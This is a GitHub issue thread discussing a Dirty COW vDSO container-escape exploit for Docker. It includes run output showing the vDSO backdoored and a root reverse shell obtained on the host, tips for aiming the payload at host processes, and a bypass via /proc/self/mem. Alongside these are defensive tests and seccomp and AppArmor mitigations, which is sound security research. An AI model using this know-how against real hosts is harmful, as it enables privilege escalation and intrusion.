### ISSUE TITLE
Is this really container escape ?

### ISSUE THREAD

**Issue by wmealing** [scumjr/dirtycow-vdso#4]
How does this differ from the other ptrace exploits out there ?  OCI blocks ptrace privs by default, how are you doing this ?  

I'd be happy to test your container on a vulnerable kernel if you've pushed it somewhere ?

Thanks.

**Comment by scumjr** [comment]
Indeed, it depends of the container configuration, and the exploit fails if `ptrace` or `madvise` aren't allowed in the container. Nevertheless, the exploit was tested successfully inside a default Docker container (the IP address of the container was fixed in `payload.s`).

Regarding other exploits, they won't work if the host filesystem is not shared with the container.

**Comment by wmealing** [comment]
I think we might have mixed definitions of 'container escape'.

My definition means to have executable code running on the host os kernel on the root cgroup/filesystem.

I think your definition means some kind of connection outgoing to a server for further controls.  Am I understanding this correctly ?

**Comment by scumjr** [comment]
No. Sorry if I wasn't clear, but my definition is the same as yours.

The exploit writes its payload into the vDSO. Since vDSO pages are shared across all processes on the system, the modifications impact the host processes even if the exploit is launched from a container. The payload is executed whenever a root process makes a call to `clock_gettime()`. If this process is running in the host, you just escaped from your container. Please note that with this exploit version you may _sometimes_ get a reverse connect shell from a root process running inside the container. You can find additional information about this technique in this [blogpost](http://scumjr.github.io/2016/01/10/from-smm-to-userland-in-a-few-bytes/).

Here's the output of a successful container escape which shows that we get a root shell in the host:

```
$ hostname
laptop-bare-metal

$ docker run -t -i ubuntu bash
root@docker-ubuntu# hostname
docker-ubuntu
root@docker-ubuntu# ./0xdeadbeef
[*] exploit: patch 1/2
[*] vdso successfully backdoored
[*] exploit: patch 2/2
[*] vdso successfully backdoored
[*] waiting for reverse connect shell...
[*] enjoy!
hostname
laptop-bare-metal
id
uid=0(root) gid=0(root) groups=0(root)
```

**Comment by trevorjay** [comment]
Can you give the results of 'capsh --print' in that container? I'm wondering if Ubuntu is ignoring OCI. Also, what Docker version?

**Comment by scumjr** [comment]
```
$ docker --version
Docker version 1.12.1, build 23cf638
```

```
$ sudo docker run -t -i ubuntu /bin/bash
root@6b80a76e6f75:/# capsh --print
Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+eip
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Securebits: 00/0x0/1'b0
 secure-noroot: no (unlocked)
 secure-no-suid-fixup: no (unlocked)
 secure-keep-caps: no (unlocked)
uid=0(root)
gid=0(root)
groups=
root@6b80a76e6f75:/# uname -a
Linux 6b80a76e6f75 4.4.0-36-generic #55-Ubuntu SMP Thu Aug 11 18:01:55 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
```

**Comment by gebl** [comment]
I may be confused, but... i think the ptrace part happens inside the call to clock_gettime on the kernel side, so it would get the kernels capabilities not the docker containers. So, i think it makes sense that once you are running the code inside the kernel you can do anything...

It totally escapes docker on my test AWS machine. 

cheers,
gabe

**Comment by gebl** [comment]
oh. nevermind.  after re-reading things a coworker and i see that the pre memory write is following this pattern:

ptrace_thread() -> backdoor_vdso() -> ptrace_memcpy() -> ptrace(PTRACE_POKETEXT )

it looks like these calls are not being blocked by the lack of CAP_SYS_PTRACE...

gabe

**Comment by trevorjay** [comment]
> it looks like these calls are not being blocked by the lack of CAP_SYS_PTRACE...
>

That's what's confusing to me as I can't reproduce that behavior on a Fed/RHEL box. In fact, I'm getting an EPERM error even when I add cap_sys_ptrace.

**Comment by trevorjay** [comment]
@gebl Can you also give the results of a `uname -a`?

**Comment by gebl** [comment]
@trevorjay sorry about the delay, work got in the way.

I've pulled all the details together to help others duplicate, and, also to be able to show people whenever they suggest Docker containers are as good as VMs for security ;-)

Here's a youtube of the exploit in progress on an aws host:

https://www.youtube.com/watch?v=R7DFJo8QaCo

Here's my docker files to get things going:

https://github.com/gebl/dirtycow-docker-vdso

here's the details if you want to build the same ami:

t2.micro
amzn-ami-hvm-2016.03.3.x86_64-gp2 (ami-7172b611)
4.4.19-29.55.amzn1.x86_64
Docker version 1.11.2, build b9f10c9/1.11.2

and the output of uname -a:

Linux  4.4.19-29.55.amzn1.x86_64 #1 SMP Mon Aug 29 23:29:40 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 
Just want to say @scumjr, thanks for making such a cool POC!

Cheers,
gabe

**Comment by trevorjay** [comment]
@gebl I think I've found the root cause (no pun intended) and I'm trying to verify it. That makes this especially helpful. Thanks!

**Comment by wmealing** [comment]
Scumjr: sorry mate, I fell asleep.  Thanks for the response.  I'll take a look.

**Comment by unixfox** [comment]
If a docker image hasn't been patched, there is no way to protect the host machine against vDSO DirtyCow inside a container ?
I'm asking this question to know if Paas could have some security issues due to this exploit.

**Comment by trevorjay** [comment]
@unixfox PaaS can be vulnerable. The best mitigation at this point is to only run unprivileged containers and to make sure that you cannot call ptrace (at all) from a container. No need to modify the images themselves. You can test for this with the following code snippet. Just save as test.c and compile with `gcc -o test test.c`.

    #include <stdio.h>
    #include <sys/ptrace.h>
    #include <unistd.h>
    #include <errno.h>
    
    int main() {  
      long ret = ptrace(PTRACE_TRACEME, 0, NULL, NULL);
      printf("%d %d: EBUSY:%d EFAULT:%d EINVAL:%d EIO:%d EPERM:%d ESRCH:%d\n",ret,errno,EBUSY,EFAULT,EINVAL,EIO,EPERM,ESRCH);
    
      return 0;
    }

Run the resulting binary in a container. If the the first two numbers are -1 and 1 respectively, ptrace is properly blocked. Something like:

    -1 1: EBUSY:16 EFAULT:14 EINVAL:22 EIO:5 EPERM:1 ESRCH:3

is what you're looking for. You *don't* want to see -1 3, -1 5 or similar. You definitely don't want to see 0 0 which means there are no restrictions whatsoever. If your container environment isn't blocking ptrace you can use docker's seccomp security-opt at container launch with a custom policy that block ptrace.

**Comment by trevorjay** [comment]
@unixfox Oh, and in case it would be overlooked: don't forget that---as @scumjr suggests---vdso can be disabled, making the ptrace issue moot.

**Comment by unixfox** [comment]
Thank you @trevorjay for the answer.
Does on OpenVZ or LXC or any other container system like is possible to access to the host machine ?

**Comment by gebl** [comment]
@trevorjay here's the output from your code on the docker in my aws instance:

root@d459be6a305d:/dirtycow-vdso# ./testptrace
0 0: EBUSY:16 EFAULT:14 EINVAL:22 EIO:5 EPERM:1 ESRCH:3


looks like there's some security policy tuning that needs to be done :-) 

thanks,
gabe

**Comment by krallin** [comment]
@trevorjay Regarding that EPERM error, you might have AppArmor enabled on that container (or another LSM), which could block the `ptrace` call (as one data point: if you're running e.g. Ubuntu with a somewhat recent of Docker, this appears to be the default). In AppArmor's case, you'd see a log entry in `dmesg` if it blocked the `ptrace` call.

**Comment by trevorjay** [comment]
@krallin I would need to check, but I believe seccomp is needed. The issue is that most ACL systems assume it's okay for a process to ptrace itself. Normally that is fine, but not with this exploit. I can confirm that both SELInux (`setsebool -P deny_ptrace 1`) and kernel caps (-cap_sys_ptrace) continue to allow PTRACE_TRACEME requests. 

I know that AppArmor used to completely block ptrace but the policy has been tweaked since then. If it does block everything and you're on a Cannonical-alike, that would be the easiest workaround.

**Comment by trevorjay** [comment]
@scumjr I'm prepping an article around this vulnerability and I'd like to shill your version of this exploit. Do you have a preferred social media account I should push?

**Comment by trevorjay** [comment]
@unixfox Any vanilla Linux container system vulnerable to dirtyCOW, using vdso, and allowing PTRACE_TRACEME is vulnerable.

**Comment by krallin** [comment]
@trevorjay yep - you're indeed correct that the default AppArmor profile provided by Docker appears to have changed over time (and correct that you don't need CAP_SYS_PTRACE to trace yourself). 

I did look into this a little further. Here's what I found if that's useful to you or others that happen to find this issue :)

On Docker 1.6, the profile appears to disallow ptrace altogether, but e.g. 1.11 allows it.I haven't looked into exactly what version changed this, but the difference in the profile (under /etc/apparmor.d/docker) is:

```
# suppress ptrace denials when using 'docker ps' or using 'ps' inside a container
ptrace (trace,read) peer=docker-default,
```

For what it's worth and as far as mitigations go, it is possible to update (by removing the offending line) and reload the policy if needed. This has the upside of applying to running containers and working for older versions of Docker that don't support seccomp.

**Comment by unixfox** [comment]
Doesn't escape from the container on LXC with Proxmox.

**Comment by gebl** [comment]
we were playing around with a commercial container that we have on site, and finding that we almost always got a shell from within the container.

We tried the idea of creating a .x file in the containers /tmp to keep the payload from sending us a root shell from within the container and waiting for the root outside (that wouldn't see the containers /tmp/.x) and this ended up working nicely.

So, even if it looks like its consistently sending you a shell from the wrong container, that doesnt mean its not working ;-) if you get a shell from outside or within the container its all good, just gotta make sure that you wait and get the appropriate root user to send you the shell.

We were tossing around ideas on how to improve the payload to detect if it was root within a container or not, and not coming up with to many great ideas. The one we came up with was looking at "/proc/1/cgroup" for container looking things, anyone have better ideas? @scumjr any thoughts?

gabe

**Comment by scumjr** [comment]
`/proc/1/cgroup` checks or something like this can easily be ported to assembly:

```bash
if [ $(readlink /proc/1/ns/pid) -eq 'pid:[4026531836]' ]; then
    echo root namespace
fi
```

**Comment by gebl** [comment]
@scumjr mwhahaha. yes. i should step up and attempt it. will try this weekend.

gabe

**Comment by scumjr** [comment]
@gebl Here you go: c26f486aafc8eb2b2fc752710a603f66b40b2ef2: don't run final payload from a container process.

**Comment by pelegw** [comment]
Has anyone managed to use this method on cloud foundry (diego/warden) containers? 
It seems to me that the inital exploit runs, as the vDSO gets overwritten, but no remote shell is obtained

**Comment by pdxjohnny** [comment]
Ah I wish I had seen this a while ago, didn't think to check the closed issues. If you use /proc/self/mem to exploit it gets around the ptrace/seccomp limitation.

**Comment by micwu** [comment]
PRETTY_NAME="Debian GNU/Linux 7 (wheezy)"
NAME="Debian GNU/Linux"
VERSION_ID="7"
VERSION="7 (wheezy)"
ID=debian
ANSI_COLOR="1;31"
HOME_URL="http://www.debian.org/"
SUPPORT_URL="http://www.debian.org/support/"
BUG_REPORT_URL="http://bugs.debian.org/"

i failed on 1.12.5. I think maybe fixed

it shows:
 root@cd10815dbfea:/dirtycow-vdso# ./0xdeadbeef 
[*] payload target: 127.0.0.1:1234
[-] failed to patch payload's ip﻿

I don't know why

**Comment by unixfox** [comment]
@micwu The exploit isn't related to docker but to the kernel version that Docker share with the host machine so if the host kernel is patched so whatever the version of docker the exploit will fail.

**Comment by scumjr** [comment]
@micwu Your problem is unrelated to this issue which is actually closed. Could you open another issue? Thanks.
